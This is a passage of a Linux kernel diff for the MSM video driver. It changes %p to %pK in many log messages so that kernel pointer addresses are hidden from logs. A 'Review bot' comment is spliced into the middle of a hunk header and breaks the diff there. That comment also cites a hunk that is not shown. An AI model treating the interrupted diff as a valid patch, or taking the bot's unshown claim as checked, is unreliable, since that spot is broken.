+1,4 @@ --/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -279,7 +279,7 @@ static int read_platform_resources(struct msm_vidc_core *core, - struct platform_device *pdev) - { - if (!core || !pdev) { -- dprintk(VIDC_ERR, "%s: Invalid params %p %p\n", -+ dprintk(VIDC_ERR, "%s: Invalid params %pK %pK\n", - __func__, core, pdev); - return -EINVAL; - } -@@ -608,7 +608,7 @@ static int msm_vidc_remove(struct platform_device *pdev) - struct msm_vidc_core *core; - - if (!pdev) { -- dprintk(VIDC_ERR, "%s invalid input %p", __func__, pdev); -+ dprintk(VIDC_ERR, "%s invalid input %pK", __func__, pdev); - return -EINVAL; - } - -diff --git a/drivers/media/platform/msm/vidc/msm_vdec.c b/drivers/media/platform/msm/vidc/msm_vdec.c -index 34a2130..99b14f4 100644 ---- a/drivers/media/platform/msm/vidc/msm_vdec.c -+++ b/drivers/media/platform/msm/vidc/msm_vdec.c -@@ -891,7 +891,7 @@ int msm_vdec_prepare_buf(struct msm_vidc_inst *inst, - if (inst->state == MSM_VIDC_CORE_INVALID || - inst->core->state == VIDC_CORE_INVALID) { - dprintk(VIDC_ERR, -- "Core %p in bad state, ignoring prepare buf\n", -+ "Core %pK in bad state, ignoring prepare buf\n", - inst->core); - goto exit; - } -@@ -970,7 +970,7 @@ int msm_vdec_release_buf(struct msm_vidc_inst *inst, - if (inst->state == MSM_VIDC_CORE_INVALID || - core->state == VIDC_CORE_INVALID) { - dprintk(VIDC_ERR, -- "Core %p in bad state, ignoring release output buf\n", -+ "Core %pK in bad state, ignoring release output buf\n", - core); - goto exit; - } -@@ -1068,7 +1068,7 @@ int msm_vdec_reqbufs(struct msm_vidc_inst *inst, struct v4l2_requestbuffers *b) - - if (!inst || !b) { - dprintk(VIDC_ERR, -- "Invalid input, inst = %p, buffer = %p\n", inst, b); -+ "Invalid input, inst = %pK, buffer = %pK\n", inst, 
b); - return -EINVAL; - } - -@@ -1098,7 +1098,7 @@ int msm_vdec_g_fmt(struct msm_vidc_inst *inst, struct v4l2_format *f) - - if (!inst || !f || !inst->core || !inst->core->device) { - dprintk(VIDC_ERR, -- "Invalid input, inst = %p, format = %p\n", inst, f); -+ "Invalid input, inst = %pK, format = %pK\n", inst, f); - return -EINVAL; - } - -@@ -1545,7 +1545,7 @@ int msm_vdec_querycap(struct msm_vidc_inst *inst, struct v4l2_capability *cap) - { - if (!inst || !cap) { - dprintk(VIDC_ERR, -- "Invalid input, inst = %p, cap = %p\n", inst, cap); -+ "Invalid input, inst = %pK, cap = %pK\n", inst, cap); - return -EINVAL; - } - strlcpy(cap->driver, MSM_VIDC_DRV_NAME, sizeof(cap->driver)); -@@ -1565,7 +1565,7 @@ int msm_vdec_enum_fmt(struct msm_vidc_inst *inst, struct v4l2_fmtdesc *f) - int rc = 0; - if (!inst || !f) { - dprintk(VIDC_ERR, -- "Invalid input, inst = %p, f = %p\n", inst, f); -+ "Invalid input, inst = %pK, f = %pK\n", inst, f); - return -EINVAL; - } - if (f->type == V4L2_BUF_TYPE_VIDEO_CAPTURE_MPLANE) { -@@ -1623,7 +1623,7 @@ static int msm_vdec_queue_setup(struct vb2_queue *q, - - if (!q || !num_buffers || !num_planes - || !sizes || !q->drv_priv) { -- dprintk(VIDC_ERR, "Invalid input, q = %p, %p, %p\n", -+ dprintk(VIDC_ERR, "Invalid input, q = %pK, %pK, %pK\n", - q, num_buffers, num_planes); - return -EINVAL; - } -@@ -1903,7 +1903,7 @@ static inline int start_streaming(struct msm_vidc_inst *inst) - rc = msm_comm_try_state(inst, MSM_VIDC_START_DONE); - if (rc) { - dprintk(VIDC_ERR, -- "Failed to move inst: %p to start done state\n", inst); -+ "Failed to move inst: %pK to start done state\n", inst); - goto fail_start; - } - msm_dcvs_init_load(inst); -@@ -1927,7 +1927,7 @@ static inline int stop_streaming(struct msm_vidc_inst *inst) - rc = msm_comm_try_state(inst, MSM_VIDC_RELEASE_RESOURCES_DONE); - if (rc) - dprintk(VIDC_ERR, -- "Failed to move inst: %p to start done state\n", inst); -+ "Failed to move inst: %pK to start done state\n", inst); - return rc; - } - -@@ 
-1937,7 +1937,7 @@ static int msm_vdec_start_streaming(struct vb2_queue *q, unsigned int count) - int rc = 0; - struct hfi_device *hdev; - if (!q || !q->drv_priv) { -- dprintk(VIDC_ERR, "Invalid input, q = %p\n", q); -+ dprintk(VIDC_ERR, "Invalid input, q = %pK\n", q); - return -EINVAL; - } - inst = q->drv_priv; -@@ -1946,7 +1946,7 @@ static int msm_vdec_start_streaming(struct vb2_queue *q, unsigned int count) - return -EINVAL; - } - hdev = inst->core->device; -- dprintk(VIDC_DBG, "Streamon called on: %d capability for inst: %p\n", -+ dprintk(VIDC_DBG, "Streamon called on: %d capability for inst: %pK\n", - q->type, inst); - switch (q->type) { - case V4L2_BUF_TYPE_VIDEO_OUTPUT_MPLANE: -@@ -1964,7 +1964,7 @@ static int msm_vdec_start_streaming(struct vb2_queue *q, unsigned int count) - } - if (rc) { - dprintk(VIDC_ERR, -- "Streamon failed on: %d capability for inst: %p\n", -+ "Streamon failed on: %d capability for inst: %pK\n", - q->type, inst); - goto stream_start_failed; - } -@@ -1986,7 +1986,7 @@ static void msm_vdec_stop_streaming(struct vb2_queue *q) - struct msm_vidc_inst *inst; - int rc = 0; - if (!q || !q->drv_priv) { -- dprintk(VIDC_ERR, "Invalid input, q = %p\n", q); -+ dprintk(VIDC_ERR, "Invalid input, q = %pK\n", q); - return; - } - -@@ -2012,7 +2012,7 @@ static void msm_vdec_stop_streaming(struct vb2_queue *q) - - if (rc) - dprintk(VIDC_ERR, -- "Failed to move inst: %p, cap = %d to state: %d\n", -+ "Failed to move inst: %pK, cap = %d to state: %d\n", - inst, q->type, MSM_VIDC_RELEASE_RESOURCES_DONE); - } - -@@ -2039,7 +2039,7 @@ int msm_vdec_inst_init(struct msm_vidc_inst *inst) - { - int rc = 0; - if (!inst) { -- dprintk(VIDC_ERR, "Invalid input = %p\n", inst); -+ dprintk(VIDC_ERR, "Invalid input = %pK\n", inst); - return -EINVAL; - } - inst->fmts[OUTPUT_PORT] = &vdec_formats[2]; -@@ -2767,7 +2767,7 @@ static int msm_vdec_op_s_ctrl(struct v4l2_ctrl *ctrl) - rc = msm_comm_try_state(inst, MSM_VIDC_OPEN_DONE); - if (rc) { - dprintk(VIDC_ERR, -- "Failed to 
move inst: %p to start done state\n", inst); -+ "Failed to move inst: %pK to start done state\n", inst); - goto failed_open_done; - } - -@@ -2796,7 +2796,7 @@ static int msm_vdec_op_g_volatile_ctrl(struct v4l2_ctrl *ctrl) - rc = msm_comm_try_state(inst, MSM_VIDC_OPEN_DONE); - if (rc) { - dprintk(VIDC_ERR, -- "Failed to move inst: %p to start done state\n", inst); -+ "Failed to move inst: %pK to start done state\n", inst); - goto failed_open_done; - } - for (c = 0; c < master->ncontrols; ++c) { -diff --git a/drivers/media/platform/msm/vidc/msm_venc.c b/drivers/media/platform/msm/vidc/msm_venc.c -index 2809d06..9589b57 100644 ---- a/drivers/media/platform/msm/vidc/msm_venc.c -+++ b/drivers/media/platform/msm/vidc/msm_venc.c -@@ -1634,13 +1634,13 @@ static inline int msm_venc_power_save_mode_enable(struct msm_vidc_inst *inst) - (void *)inst->session, prop_id, pdata); - if (rc) { - dprintk(VIDC_ERR, -- "%s: Failed to set power save mode for inst: %p\n", -+ "%s: Failed to set power save mode for inst: %pK\n", - __func__, inst); - goto fail_power_mode_set; - } - inst->flags |= VIDC_LOW_POWER; - msm_dcvs_enc_set_power_save_mode(inst, true); -- dprintk(VIDC_INFO, "Power Save Mode set for inst: %p\n", inst); -+ dprintk(VIDC_INFO, "Power Save Mode set for inst: %pK\n", inst); - } - - fail_power_mode_set: -@@ -1685,7 +1685,7 @@ static inline int start_streaming(struct msm_vidc_inst *inst) - rc = msm_comm_try_state(inst, MSM_VIDC_START_DONE); - if (rc) { - dprintk(VIDC_ERR, -- "Failed to move inst: %p to start done state\n", inst); -+ "Failed to move inst: %pK to start done state\n", inst); - goto fail_start; - } - msm_dcvs_init_load(inst); -@@ -1699,11 +1699,11 @@ static int msm_venc_start_streaming(struct vb2_queue *q, unsigned int count) - struct msm_vidc_inst *inst; - int rc = 0; - if (!q || !q->drv_priv) { -- dprintk(VIDC_ERR, "Invalid input, q = %p\n", q); -+ dprintk(VIDC_ERR, "Invalid input, q = %pK\n", q); - return -EINVAL; - } - inst = q->drv_priv; -- 
dprintk(VIDC_DBG, "Streamon called on: %d capability for inst: %p\n", -+ dprintk(VIDC_DBG, "Streamon called on: %d capability for inst: %pK\n", - q->type, inst); - switch (q->type) { - case V4L2_BUF_TYPE_VIDEO_OUTPUT_MPLANE: -@@ -1721,7 +1721,7 @@ static int msm_venc_start_streaming(struct vb2_queue *q, unsigned int count) - } - if (rc) { - dprintk(VIDC_ERR, -- "Streamon failed on: %d capability for inst: %p\n", -+ "Streamon failed on: %d capability for inst: %pK\n", - q->type, inst); - goto stream_start_failed; - } -@@ -1743,7 +1743,7 @@ static void msm_venc_stop_streaming(struct vb2_queue *q) - struct msm_vidc_inst *inst; - int rc = 0; - if (!q || !q->drv_priv) { -- dprintk(VIDC_ERR, "%s - Invalid input, q = %p\n", __func__, q); -+ dprintk(VIDC_ERR, "%s - Invalid input, q = %pK\n", __func__, q); - return; - } - -@@ -1765,7 +1765,7 @@ static void msm_venc_stop_streaming(struct vb2_queue *q) - - if (rc) - dprintk(VIDC_ERR, -- "Failed to move inst: %p, cap = %d to state: %d\n", -+ "Failed to move inst: %pK, cap = %d to state: %d\n", - inst, q->type, MSM_VIDC_CLOSE_DONE); - } - -@@ -3271,7 +3271,7 @@ static int msm_venc_op_s_ctrl(struct v4l2_ctrl *ctrl) - - if (rc) { - dprintk(VIDC_ERR, -- "Failed to move inst: %p to start done state\n", inst); -+ "Failed to move inst: %pK to start done state\n", inst); - goto failed_open_done; - } - -@@ -3315,7 +3315,7 @@ int msm_venc_inst_init(struct msm_vidc_inst *inst) - { - int rc = 0; - if (!inst) { -- dprintk(VIDC_ERR, "Invalid input = %p\n", inst); -+ dprintk(VIDC_ERR, "Invalid input = %pK\n", inst); - return -EINVAL; - } - inst->fmts[CAPTURE_PORT] = &venc_formats[4]; -@@ -3359,7 +3359,7 @@ int msm_venc_querycap(struct msm_vidc_inst *inst, struct v4l2_capability *cap) - { - if (!inst || !cap) { - dprintk(VIDC_ERR, -- "Invalid input, inst = %p, cap = %p\n", inst, cap); -+ "Invalid input, inst = %pK, cap = %pK\n", inst, cap); - return -EINVAL; - } - strlcpy(cap->driver, MSM_VIDC_DRV_NAME, sizeof(cap->driver)); -@@ -3379,7 
+3379,7 @@ int msm_venc_enum_fmt(struct msm_vidc_inst *inst, struct v4l2_fmtdesc *f) - int rc = 0; - if (!inst || !f) { - dprintk(VIDC_ERR, -- "Invalid input, inst = %p, f = %p\n", inst, f); -+ "Invalid input, inst = %pK, f = %pK\n", inst, f); - return -EINVAL; - } - if (f->type == V4L2_BUF_TYPE_VIDEO_CAPTURE_MPLANE) { -@@ -3436,7 +3436,7 @@ int msm_venc_s_fmt(struct msm_vidc_inst *inst, struct v4l2_format *f) - struct hfi_device *hdev; - if (!inst || !f) { - dprintk(VIDC_ERR, -- "Invalid input, inst = %p, format = %p\n", inst, f); -+ "Invalid input, inst = %pK, format = %pK\n", inst, f); - return -EINVAL; - } - -@@ -3583,7 +3583,7 @@ int msm_venc_g_fmt(struct msm_vidc_inst *inst, struct v4l2_format *f) - - if (!inst || !f) { - dprintk(VIDC_ERR, -- "Invalid input, inst = %p, format = %p\n", inst, f); -+ "Invalid input, inst = %pK, format = %pK\n", inst, f); - return -EINVAL; - } - -@@ -3656,7 +3656,7 @@ int msm_venc_reqbufs(struct msm_vidc_inst *inst, struct v4l2_requestbuffers *b) - int rc = 0; - if (!inst || !b) { - dprintk(VIDC_ERR, -- "Invalid input, inst = %p, buffer = %p\n", inst, b); -+ "Invalid input, inst = %pK, buffer = %pK\n", inst, b); - return -EINVAL; - } - q = msm_comm_get_vb2q(inst, b->type); -@@ -3693,7 +3693,7 @@ int msm_venc_prepare_buf(struct msm_vidc_inst *inst, - if (inst->state == MSM_VIDC_CORE_INVALID || - inst->core->state == VIDC_CORE_INVALID) { - dprintk(VIDC_ERR, -- "Core %p in bad state, ignoring prepare buf\n", -+ "Core %pK in bad state, ignoring prepare buf\n", - inst->core); - goto exit; - } -@@ -3764,7 +3764,7 @@ int msm_venc_release_buf(struct msm_vidc_inst *inst, - rc = msm_comm_try_state(inst, MSM_VIDC_RELEASE_RESOURCES_DONE); - if (rc) { - dprintk(VIDC_ERR, -- "Failed to move inst: %p to release res done state\n", -+ "Failed to move inst: %pK to release res done state\n", - inst); - goto exit; - } -diff --git a/drivers/media/platform/msm/vidc/msm_vidc.c b/drivers/media/platform/msm/vidc/msm_vidc.c -index 904ced9..7e186f6 100644 
---- a/drivers/media/platform/msm/vidc/msm_vidc.c -+++ b/drivers/media/platform/msm/vidc/msm_vidc.c -@@ -285,7 +285,7 @@ struct buffer_info *device_to_uvaddr(struct msm_vidc_list *buf_list, - - if (!buf_list || !device_addr) { - dprintk(VIDC_ERR, -- "Invalid input- device_addr: %pa buf_list: %p\n", -+ "Invalid input- device_addr: %pa buf_list: %pK\n", - &device_addr, buf_list); - goto err_invalid_input; - } -@@ -425,7 +425,7 @@ int map_and_register_buf(struct msm_vidc_inst *inst, struct v4l2_buffer *b) - goto exit; - } - -- dprintk(VIDC_DBG, "[MAP] Create binfo = %p fd = %d type = %d\n", -+ dprintk(VIDC_DBG, "[MAP] Create binfo = %pK fd = %d type = %d\n", - binfo, b->m.planes[0].reserved[0], b->type); - - for (i = 0; i < b->length; ++i) { -@@ -515,7 +515,7 @@ int map_and_register_buf(struct msm_vidc_inst *inst, struct v4l2_buffer *b) - goto exit; - } - dprintk(VIDC_DBG, -- "%s: [MAP] binfo = %p, handle[%d] = %p, device_addr = %pa, fd = %d, offset = %d, mapped = %d\n", -+ "%s: [MAP] binfo = %pK, handle[%d] = %pK, device_addr = %pa, fd = %d, offset = %d, mapped = %d\n", - __func__, binfo, i, binfo->handle[i], - &binfo->device_addr[i], binfo->fd[i], - binfo->buff_off[i], binfo->mapped[i]); -@@ -538,7 +538,7 @@ int unmap_and_deregister_buf(struct msm_vidc_inst *inst, - bool found = false, keep_node = false; - - if (!inst || !binfo) { -- dprintk(VIDC_ERR, "%s invalid param: %p %p\n", -+ dprintk(VIDC_ERR, "%s invalid param: %pK %pK\n", - __func__, inst, binfo); - return -EINVAL; - } -@@ -568,7 +568,7 @@ int unmap_and_deregister_buf(struct msm_vidc_inst *inst, - - for (i = 0; i < temp->num_planes; i++) { - dprintk(VIDC_DBG, -- "%s: [UNMAP] binfo = %p, handle[%d] = %p, device_addr = %pa, fd = %d, offset = %d, mapped = %d\n", -+ "%s: [UNMAP] binfo = %pK, handle[%d] = %pK, device_addr = %pa, fd = %d, offset = %d, mapped = %d\n", - __func__, temp, i, temp->handle[i], - &temp->device_addr[i], temp->fd[i], - temp->buff_off[i], temp->mapped[i]); -@@ -597,12 +597,12 @@ int 
unmap_and_deregister_buf(struct msm_vidc_inst *inst, - } - } - if (!keep_node) { -- dprintk(VIDC_DBG, "[UNMAP] AND-FREED binfo: %p\n", temp); -+ dprintk(VIDC_DBG, "[UNMAP] AND-FREED binfo: %pK\n", temp); - list_del(&temp->list); - kfree(temp); - } else { - temp->inactive = true; -- dprintk(VIDC_DBG, "[UNMAP] NOT-FREED binfo: %p\n", temp); -+ dprintk(VIDC_DBG, "[UNMAP] NOT-FREED binfo: %pK\n", temp); - } - exit: - return 0; -@@ -616,7 +616,7 @@ int qbuf_dynamic_buf(struct msm_vidc_inst *inst, - struct v4l2_plane plane[VIDEO_MAX_PLANES] = { {0} }; - - if (!binfo) { -- dprintk(VIDC_ERR, "%s invalid param: %p\n", __func__, binfo); -+ dprintk(VIDC_ERR, "%s invalid param: %pK\n", __func__, binfo); - return -EINVAL; - } - dprintk(VIDC_DBG, "%s fd[0] = %d\n", __func__, binfo->fd[0]); -@@ -639,12 +639,12 @@ int output_buffer_cache_invalidate(struct msm_vidc_inst *inst, - int rc = 0; - - if (!inst) { -- dprintk(VIDC_ERR, "%s: invalid inst: %p\n", __func__, inst); -+ dprintk(VIDC_ERR, "%s: invalid inst: %pK\n", __func__, inst); - return -EINVAL; - } - - if (!binfo) { -- dprintk(VIDC_ERR, "%s: invalid buffer info: %p\n", -+ dprintk(VIDC_ERR, "%s: invalid buffer info: %pK\n", - __func__, inst); - return -EINVAL; - } -@@ -720,7 +720,7 @@ int msm_vidc_release_buffers(void *instance, int buffer_type) - rc = msm_comm_try_state(inst, MSM_VIDC_RELEASE_RESOURCES_DONE); - if (rc) { - dprintk(VIDC_ERR, -- "Failed to move inst: %p to release res done\n", -+ "Failed to move inst: %pK to release res done\n", - inst); - } - } -@@ -784,7 +784,7 @@ free_and_unmap: - for (i = 0; i < bi->num_planes; i++) { - if (bi->handle[i] && bi->mapped[i]) { - dprintk(VIDC_DBG, -- "%s: [UNMAP] binfo = %p, handle[%d] = %p, device_addr = %pa, fd = %d, offset = %d, mapped = %d\n", -+ "%s: [UNMAP] binfo = %pK, handle[%d] = %pK, device_addr = %pa, fd = %d, offset = %d, mapped = %d\n", - __func__, bi, i, bi->handle[i], - &bi->device_addr[i], bi->fd[i], - bi->buff_off[i], bi->mapped[i]); -@@ -986,7 +986,7 @@ int 
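Review bot: In the `output_buffer_cache_invalidate` hunk the `!binfo` branch passes `inst` as the argument, so the message labelled "invalid buffer info" prints the instance pointer instead. `binfo` is known to be NULL at that point, so `dprintk(VIDC_ERR, "%s: invalid buffer info\n", __func__);` carries the same information without logging an address. The `msm_comm_try_state` hunk has the same mismatch: `"Invalid core pointer = %pK\n", inst` prints `inst` under a "core" label, and `"Invalid core pointer for inst %pK\n"` would match the argument. Both function bodies continue outside their hunks.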
msm_vidc_enum_framesizes(void *instance, struct v4l2_frmsizeenum *fsize) - struct msm_vidc_capability *capability = NULL; - - if (!inst || !fsize) { -- dprintk(VIDC_ERR, "%s: invalid parameter: %p %p\n", -+ dprintk(VIDC_ERR, "%s: invalid parameter: %pK %pK\n", - __func__, inst, fsize); - return -EINVAL; - } -@@ -1148,7 +1148,7 @@ void *msm_vidc_open(int core_id, int session_type) - goto err_invalid_core; - } - -- pr_info(VIDC_DBG_TAG "Opening video instance: %p, %d\n", -+ pr_info(VIDC_DBG_TAG "Opening video instance: %pK, %d\n", - VIDC_MSG_PRIO2STRING(VIDC_INFO), inst, session_type); - mutex_init(&inst->sync_lock); - mutex_init(&inst->bufq[CAPTURE_PORT].lock); -@@ -1314,7 +1314,7 @@ int msm_vidc_destroy(struct msm_vidc_inst *inst) - for (i = 0; i < MAX_PORT_NUM; i++) - vb2_queue_release(&inst->bufq[i].vb2_bufq); - -- pr_info(VIDC_DBG_TAG "Closed video instance: %p\n", -+ pr_info(VIDC_DBG_TAG "Closed video instance: %pK\n", - VIDC_MSG_PRIO2STRING(VIDC_INFO), inst); - kfree(inst); - return 0; -diff --git a/drivers/media/platform/msm/vidc/msm_vidc_common.c b/drivers/media/platform/msm/vidc/msm_vidc_common.c -index 1eed94b..5a9e6d2 100644 ---- a/drivers/media/platform/msm/vidc/msm_vidc_common.c -+++ b/drivers/media/platform/msm/vidc/msm_vidc_common.c -@@ -303,7 +303,7 @@ int msm_comm_get_inst_load(struct msm_vidc_inst *inst, - if (is_non_realtime_session(inst) && - (quirks & LOAD_CALC_IGNORE_NON_REALTIME_LOAD)) { - if (!inst->prop.fps) { -- dprintk(VIDC_INFO, "instance:%p fps = 0\n", inst); -+ dprintk(VIDC_INFO, "instance:%pK fps = 0\n", inst); - load = 0; - } else { - load = msm_comm_get_mbs_per_sec(inst) / inst->prop.fps; -@@ -322,7 +322,7 @@ int msm_comm_get_load(struct msm_vidc_core *core, - int num_mbs_per_sec = 0; - - if (!core) { -- dprintk(VIDC_ERR, "Invalid args: %p\n", core); -+ dprintk(VIDC_ERR, "Invalid args: %pK\n", core); - return -EINVAL; - } - -@@ -451,13 +451,13 @@ static int msm_comm_vote_bus(struct msm_vidc_core *core) - unsigned long core_freq = 0; 
- - if (!core) { -- dprintk(VIDC_ERR, "%s Invalid args: %p\n", __func__, core); -+ dprintk(VIDC_ERR, "%s Invalid args: %pK\n", __func__, core); - return -EINVAL; - } - - hdev = core->device; - if (!hdev) { -- dprintk(VIDC_ERR, "%s Invalid device handle: %p\n", -+ dprintk(VIDC_ERR, "%s Invalid device handle: %pK\n", - __func__, hdev); - return -EINVAL; - } -@@ -569,7 +569,7 @@ const struct msm_vidc_format *msm_comm_get_pixel_fmt_index( - { - int i, k = 0; - if (!fmt || index < 0) { -- dprintk(VIDC_ERR, "Invalid inputs, fmt = %p, index = %d\n", -+ dprintk(VIDC_ERR, "Invalid inputs, fmt = %pK, index = %d\n", - fmt, index); - return NULL; - } -@@ -591,7 +591,7 @@ struct msm_vidc_format *msm_comm_get_pixel_fmt_fourcc( - { - int i; - if (!fmt) { -- dprintk(VIDC_ERR, "Invalid inputs, fmt = %p\n", fmt); -+ dprintk(VIDC_ERR, "Invalid inputs, fmt = %pK\n", fmt); - return NULL; - } - for (i = 0; i < size; i++) { -@@ -819,11 +819,11 @@ static void change_inst_state(struct msm_vidc_inst *inst, - mutex_lock(&inst->lock); - if (inst->state == MSM_VIDC_CORE_INVALID) { - dprintk(VIDC_DBG, -- "Inst: %p is in bad state can't change state to %d\n", -+ "Inst: %pK is in bad state can't change state to %d\n", - inst, state); - goto exit; - } -- dprintk(VIDC_DBG, "Moved inst: %p from state: %d to state: %d\n", -+ dprintk(VIDC_DBG, "Moved inst: %pK from state: %d to state: %d\n", - inst, inst->state, state); - inst->state = state; - exit: -@@ -834,7 +834,7 @@ static int signal_session_msg_receipt(enum hal_command_response cmd, - struct msm_vidc_inst *inst) - { - if (!inst) { -- dprintk(VIDC_ERR, "Invalid(%p) instance id\n", inst); -+ dprintk(VIDC_ERR, "Invalid(%pK) instance id\n", inst); - return -EINVAL; - } - if (IS_HAL_SESSION_CMD(cmd)) { -@@ -877,7 +877,7 @@ static int wait_for_state(struct msm_vidc_inst *inst, - { - int rc = 0; - if (IS_ALREADY_IN_STATE(flipped_state, desired_state)) { -- dprintk(VIDC_INFO, "inst: %p is already in state: %d\n", -+ dprintk(VIDC_INFO, "inst: %pK is 
already in state: %d\n", - inst, inst->state); - goto err_same_state; - } -@@ -1083,7 +1083,7 @@ static void handle_event_change(enum hal_command_response cmd, void *data) - struct buffer_info *binfo = NULL, *temp = NULL; - u32 *ptr = NULL; - -- dprintk(VIDC_DBG, "%s - inst: %p buffer: %pa extra: %pa\n", -+ dprintk(VIDC_DBG, "%s - inst: %pK buffer: %pa extra: %pa\n", - __func__, inst, &event_notify->packet_buffer, - &event_notify->extra_data_buffer); - -@@ -1479,11 +1479,11 @@ static void handle_session_error(enum hal_command_response cmd, void *data) - } - - hdev = inst->core->device; -- dprintk(VIDC_WARN, "Session error received for session %p\n", inst); -+ dprintk(VIDC_WARN, "Session error received for session %pK\n", inst); - change_inst_state(inst, MSM_VIDC_CORE_INVALID); - - if (response->status == VIDC_ERR_MAX_CLIENTS) { -- dprintk(VIDC_WARN, "Too many clients, rejecting %p", inst); -+ dprintk(VIDC_WARN, "Too many clients, rejecting %pK", inst); - event = V4L2_EVENT_MSM_VIDC_MAX_CLIENTS; - - /* -@@ -1495,10 +1495,10 @@ static void handle_session_error(enum hal_command_response cmd, void *data) - - msm_comm_session_clean(inst); - } else if (response->status == VIDC_ERR_NOT_SUPPORTED) { -- dprintk(VIDC_WARN, "Unsupported bitstream in %p", inst); -+ dprintk(VIDC_WARN, "Unsupported bitstream in %pK", inst); - event = V4L2_EVENT_MSM_VIDC_HW_UNSUPPORTED; - } else { -- dprintk(VIDC_WARN, "Unknown session error (%d) for %p\n", -+ dprintk(VIDC_WARN, "Unknown session error (%d) for %pK\n", - response->status, inst); - event = V4L2_EVENT_MSM_VIDC_SYS_ERROR; - } -@@ -1515,7 +1515,7 @@ static void msm_comm_clean_notify_client(struct msm_vidc_core *core) - return; - } - -- dprintk(VIDC_WARN, "%s: Core %p\n", __func__, core); -+ dprintk(VIDC_WARN, "%s: Core %pK\n", __func__, core); - mutex_lock(&core->lock); - core->state = VIDC_CORE_INVALID; - -@@ -1524,7 +1524,7 @@ static void msm_comm_clean_notify_client(struct msm_vidc_core *core) - inst->state = MSM_VIDC_CORE_INVALID; 
- mutex_unlock(&inst->lock); - dprintk(VIDC_WARN, -- "%s Send sys error for inst %p\n", __func__, inst); -+ "%s Send sys error for inst %pK\n", __func__, inst); - msm_vidc_queue_v4l2_event(inst, - V4L2_EVENT_MSM_VIDC_SYS_ERROR); - } -@@ -1552,7 +1552,7 @@ static void handle_sys_error(enum hal_command_response cmd, void *data) - return; - } - -- dprintk(VIDC_WARN, "SYS_ERROR %d received for core %p\n", cmd, core); -+ dprintk(VIDC_WARN, "SYS_ERROR %d received for core %pK\n", cmd, core); - msm_comm_clean_notify_client(core); - - hdev = core->device; -@@ -1584,12 +1584,12 @@ void msm_comm_session_clean(struct msm_vidc_inst *inst) - hdev = inst->core->device; - mutex_lock(&inst->lock); - if (hdev && inst->session) { -- dprintk(VIDC_DBG, "cleaning up instance: %p\n", inst); -+ dprintk(VIDC_DBG, "cleaning up instance: %pK\n", inst); - rc = call_hfi_op(hdev, session_clean, - (void *)inst->session); - if (rc) { - dprintk(VIDC_ERR, -- "Session clean failed :%p\n", inst); -+ "Session clean failed :%pK\n", inst); - } - inst->session = NULL; - } -@@ -2003,7 +2003,7 @@ static void handle_fbd(enum hal_command_response cmd, void *data) - - if (extra_idx && extra_idx < VIDEO_MAX_PLANES) { - dprintk(VIDC_DBG, -- "extradata: userptr = %p;" -+ "extradata: userptr = %pK;" - " bytesused = %d; length = %d\n", - (u8 *)vb->v4l2_planes[extra_idx].m.userptr, - vb->v4l2_planes[extra_idx].bytesused, -@@ -2159,13 +2159,13 @@ int msm_comm_scale_clocks_load(struct msm_vidc_core *core, - int codec = 0; - - if (!core) { -- dprintk(VIDC_ERR, "%s Invalid args: %p\n", __func__, core); -+ dprintk(VIDC_ERR, "%s Invalid args: %pK\n", __func__, core); - return -EINVAL; - } - - hdev = core->device; - if (!hdev) { -- dprintk(VIDC_ERR, "%s Invalid device handle: %p\n", -+ dprintk(VIDC_ERR, "%s Invalid device handle: %pK\n", - __func__, hdev); - return -EINVAL; - } -@@ -2339,7 +2339,7 @@ static int msm_comm_session_abort(struct msm_vidc_inst *inst) - msecs_to_jiffies(msm_vidc_hw_rsp_timeout)); - if (!rc) { - 
dprintk(VIDC_ERR, -- "%s: Wait interrupted or timed out [%p]: %d\n", -+ "%s: Wait interrupted or timed out [%pK]: %d\n", - __func__, inst, abort_completion); - BUG_ON(msm_vidc_debug_timeout); - rc = -EBUSY; -@@ -2367,7 +2367,7 @@ static void handle_thermal_event(struct msm_vidc_core *core) - mutex_unlock(&core->lock); - if (inst->state >= MSM_VIDC_OPEN_DONE && - inst->state < MSM_VIDC_CLOSE_DONE) { -- dprintk(VIDC_WARN, "%s: abort inst %p\n", -+ dprintk(VIDC_WARN, "%s: abort inst %pK\n", - __func__, inst); - rc = msm_comm_session_abort(inst); - if (rc) { -@@ -2378,7 +2378,7 @@ static void handle_thermal_event(struct msm_vidc_core *core) - } - change_inst_state(inst, MSM_VIDC_CORE_INVALID); - dprintk(VIDC_WARN, -- "%s Send sys error for inst %p\n", -+ "%s Send sys error for inst %pK\n", - __func__, inst); - msm_vidc_queue_v4l2_event(inst, - V4L2_EVENT_MSM_VIDC_SYS_ERROR); -@@ -2578,7 +2578,7 @@ static int msm_comm_session_init(int flipped_state, - hdev = inst->core->device; - - if (IS_ALREADY_IN_STATE(flipped_state, MSM_VIDC_OPEN)) { -- dprintk(VIDC_INFO, "inst: %p is already in state: %d\n", -+ dprintk(VIDC_INFO, "inst: %pK is already in state: %d\n", - inst, inst->state); - goto exit; - } -@@ -2600,7 +2600,7 @@ static int msm_comm_session_init(int flipped_state, - - if (rc || !inst->session) { - dprintk(VIDC_ERR, -- "Failed to call session init for: %p, %p, %d, %d\n", -+ "Failed to call session init for: %pK, %pK, %d, %d\n", - inst->core->device, inst, - inst->session_type, fourcc); - rc = -EINVAL; -@@ -2689,7 +2689,7 @@ static int msm_vidc_load_resources(int flipped_state, - - hdev = core->device; - if (IS_ALREADY_IN_STATE(flipped_state, MSM_VIDC_LOAD_RESOURCES)) { -- dprintk(VIDC_INFO, "inst: %p is already in state: %d\n", -+ dprintk(VIDC_INFO, "inst: %pK is already in state: %d\n", - inst, inst->state); - goto exit; - } -@@ -2725,7 +2725,7 @@ static int msm_vidc_start(int flipped_state, struct msm_vidc_inst *inst) - - if (IS_ALREADY_IN_STATE(flipped_state, 
